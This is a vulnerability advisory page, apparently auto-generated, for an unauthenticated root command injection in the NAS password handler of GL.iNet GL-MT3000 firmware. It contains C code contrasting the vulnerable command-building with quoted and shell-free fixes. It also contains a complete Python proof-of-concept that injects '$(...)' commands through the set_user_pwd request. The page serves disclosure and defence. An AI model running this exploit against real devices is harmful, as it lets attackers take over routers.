CVE-2026-11452
Description
Command injection in GL.iNet GL-MT3000 firmware up to 4.4.5 allows unauthenticated remote attackers to execute arbitrary commands as root.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
A command injection vulnerability exists in the /cgi-bin/glc endpoint of GL.iNet GL-MT3000 devices running firmware versions up to 4.4.5. The SET_USER_PWD handler within the nas-web.so plugin, specifically in the FUN_0042e200 function, is susceptible to manipulation of the Password argument. This handler constructs a shell command using snprintf and executes it via system(), allowing for command substitution when the password is not properly escaped [1].
Exploitation
An unauthenticated attacker can exploit this vulnerability by sending a specially crafted POST request to the /cgi-bin/glc endpoint. The request should include a JSON payload with the set_user_pwd method and a password argument containing shell command substitution syntax, such as $() or backticks, to execute arbitrary commands. The vulnerability is triggered when the gl_nas_sys daemon processes this request, forwarding it to the nas-web.so plugin without sufficient authentication or input validation [1].
Impact
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with root privileges on the affected GL.iNet GL-MT3000 device. This could lead to a complete compromise of the device, enabling the attacker to steal sensitive information, modify system configurations, or use the device for further malicious activities [1].
Mitigation
GL.iNet has addressed this vulnerability in firmware version 4.8.1. Users are advised to upgrade their GL-MT3000 devices to version 4.8.1 or later to mitigate this risk. The vendor's testing on version 4.8.1 indicated that payloads relying on command substitution are no longer executed [1].
AI Insight generated on Jun 7, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Vulnerability mechanics
Root cause
"The `smbpasswd` command is constructed using `snprintf` with user-controlled input directly embedded within double quotes, allowing shell command substitution."
Attack vector
An unauthenticated attacker can send a POST request to the `/cgi-bin/glc` endpoint with a JSON payload specifying the `set_user_pwd` method. The payload includes a username and a crafted password containing shell command substitution syntax, such as `$(command)`. This payload is forwarded to the `gl_nas_sys` daemon, which then executes the `smbpasswd` command with the manipulated password, leading to arbitrary command execution as root [ref_id=1]. The vulnerability is exploitable remotely without authentication [ref_id=1].
Affected code
The vulnerability lies within the `FUN_0042e200` function in the `/cgi-bin/glc` component, specifically in how the `Password` argument is handled. The `gl_nas_sys` daemon's `SET_USER_PWD` handler, identified as `FUN_0043db80`, extracts the password and passes it through `FUN_0042e200` and `FUN_0042d340`, which ultimately constructs and executes a shell command via `system()` [ref_id=1].
What the fix does
The vendor states that upgrading to version 4.8.1 addresses the issue. The current code escapes single quotes and handles the password within a single-quote context, preventing payloads that rely on `$()` or backticks from executing. This implies that the fix likely involves more robust sanitization or a different command execution method that does not allow for shell expansion within the password parameter.
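The root cause and the two ways of closing it, as an added C illustration (not the firmware's code: the exact command string GL.iNet builds is not on the page, so the `smbpasswd -s -a` shape used here is an assumption). `build_cmd_unsafe` reproduces the vulnerable pattern of interpolating the password into a double-quoted word for `system()`, where `$(...)` still expands; `shell_single_quote` implements the single-quote escaping the fix is described as using; `run_no_shell` goes one step further and never invokes a shell at all, delivering the secret over a pipe to a fixed argv so no byte of it is ever parsed as shell syntax.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* 1. Vulnerable shape: user input dropped into a double-quoted shell word.
 *    /bin/sh still performs $(...) and `...` substitution inside double quotes,
 *    so a password of  Aa1!$(id)  runs `id` as the caller (root here).
 *    Command layout is an assumption for illustration, not the firmware's. */
int build_cmd_unsafe(char *out, size_t outlen, const char *user, const char *pw)
{
    int n = snprintf(out, outlen,
                     "(echo \"%s\"; echo \"%s\") | smbpasswd -s -a \"%s\"",
                     pw, pw, user);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

/* 2. The quoting fix: wrap the value in single quotes and rewrite each
 *    embedded ' as '\'' (close quote, escaped quote, reopen quote).  Nothing
 *    inside single quotes is expanded.  Returns bytes written, -1 if out is
 *    too small. */
int shell_single_quote(const char *in, char *out, size_t outlen)
{
    size_t pos = 0;
    if (pos + 1 >= outlen) return -1;
    out[pos++] = '\'';
    for (const char *p = in; *p; p++) {
        if (*p == '\'') {
            if (pos + 4 >= outlen) return -1;
            memcpy(out + pos, "'\\''", 4);
            pos += 4;
        } else {
            if (pos + 1 >= outlen) return -1;
            out[pos++] = *p;
        }
    }
    if (pos + 1 >= outlen) return -1;
    out[pos++] = '\'';
    out[pos] = '\0';
    return (int)pos;
}

int build_cmd_quoted(char *out, size_t outlen, const char *user, const char *pw)
{
    char qpw[512], quser[256];
    if (shell_single_quote(pw, qpw, sizeof qpw) < 0 ||
        shell_single_quote(user, quser, sizeof quser) < 0)
        return -1;
    int n = snprintf(out, outlen, "(echo %s; echo %s) | smbpasswd -s -a %s",
                     qpw, qpw, quser);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

/* 3. The stronger fix: no shell.  fork/exec a fixed argv and hand the secret
 *    to the child over a pipe on stdin.  Child stdout is captured into out so
 *    a caller can verify the bytes arrived untouched.  Returns the child's
 *    exit status, or -1 on error. */
int run_no_shell(char *const argv[], const char *stdin_data, char *out, size_t outlen)
{
    int in[2], outp[2];
    if (pipe(in) < 0 || pipe(outp) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                      /* child: wire pipes, exec argv */
        dup2(in[0], STDIN_FILENO);
        dup2(outp[1], STDOUT_FILENO);
        close(in[0]); close(in[1]); close(outp[0]); close(outp[1]);
        execvp(argv[0], argv);
        _exit(127);
    }
    close(in[0]); close(outp[1]);
    size_t len = strlen(stdin_data);
    if (write(in[1], stdin_data, len) != (ssize_t)len) { /* best effort */ }
    close(in[1]);                        /* EOF tells the child we are done */
    size_t got = 0;
    ssize_t r;
    while (got + 1 < outlen && (r = read(outp[0], out + got, outlen - 1 - got)) > 0)
        got += (size_t)r;
    out[got] = '\0';
    close(outp[0]);
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *pw = "Aa1!$(id)'x";     /* constructed sample, not run by a shell here */
    char cmd[1024], out[256];
    build_cmd_unsafe(cmd, sizeof cmd, "nas", pw);
    printf("unsafe : %s\n", cmd);       /* $(id) survives inside double quotes */
    build_cmd_quoted(cmd, sizeof cmd, "nas", pw);
    printf("quoted : %s\n", cmd);       /* inert inside single quotes */
    char *const demo[] = {"cat", NULL}; /* stand-in for the real helper binary */
    run_no_shell(demo, pw, out, sizeof out);
    printf("noshell: child saw %s\n", out);
    return 0;
}
```

The single-quote escaping is sufficient only if every interpolated argument is quoted that way; the argv-plus-pipe approach removes the shell from the path entirely, which is the option to prefer when a handler already runs as root.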
Preconditions
- auth: No authentication is required to access the vulnerable endpoint [ref_id=1].
- input: The attacker must know an existing NAS username to target [ref_id=1].
- network: The target device must be accessible over the network.
Reproduction
```python
import json, shlex, ssl, sys, time, urllib.request

TARGET = sys.argv[1] if len(sys.argv) > 1 else "https://192.168.8.1"
CMD = sys.argv[2] if len(sys.argv) > 2 else "id"
NAS_USER = sys.argv[3] if len(sys.argv) > 3 else ""
OUT = sys.argv[4] if len(sys.argv) > 4 else "/tmp/poc25_nas_setpwd"

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def glc(method, args):
    body = {"object": "nas-web", "method": method, "args": args}
    req = urllib.request.Request(
        TARGET.rstrip("/") + "/cgi-bin/glc",
        data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    resp = urllib.request.urlopen(req, timeout=10, context=ctx)
    return "%d %s" % (resp.status, resp.read().decode(errors="replace"))


def parse_glc_json(raw):
    parts = raw.split(" ", 2)
    if len(parts) < 3:
        return {}
    return json.loads(parts[2] or "{}")


try:
    print("[+] start nas service")
    print("[+] set_nas_ser:", glc("set_nas_ser", {"enable": 1})[:200])
    print("[+] start :", glc("start", {})[:200])
    time.sleep(2)

    if not NAS_USER:
        users = parse_glc_json(glc("get_user_list", {})).get("list", [])
        print("[+] NAS users:", [u["name"] for u in users])
        if not users:
            print("[-] no NAS user found, pass one as argv[3]")
            sys.exit(1)
        NAS_USER = users[-1]["name"]

    command = "sh -c %s>%s 2>&1" % (shlex.quote(CMD), shlex.quote(OUT))
    nonce = str(time.time_ns())[-8:]
    password = "Aa1!$(%s)%s" % (command, nonce)

    print("[+] target :", TARGET)
    print("[+] nonce :", nonce)
    print("[+] user :", NAS_USER)
    print("[+] command :", CMD)
    print("[+] output :", OUT)
    print("[+] payload :", password)

    raw = glc("set_user_pwd", {"name": NAS_USER, "password": password})
    print("[+] response:", raw[:200])

except Exception as e:
    # gl_nas_sys sometimes returns HTTP 502 after the command has already run.
    print("[-] request failed: %s" % e)
    print("[!] HTTP failure does not necessarily mean exploit failed; check output file.")

print("[+] check: cat %s" % OUT)
```
[ref_id=1]
Generated on Jun 7, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.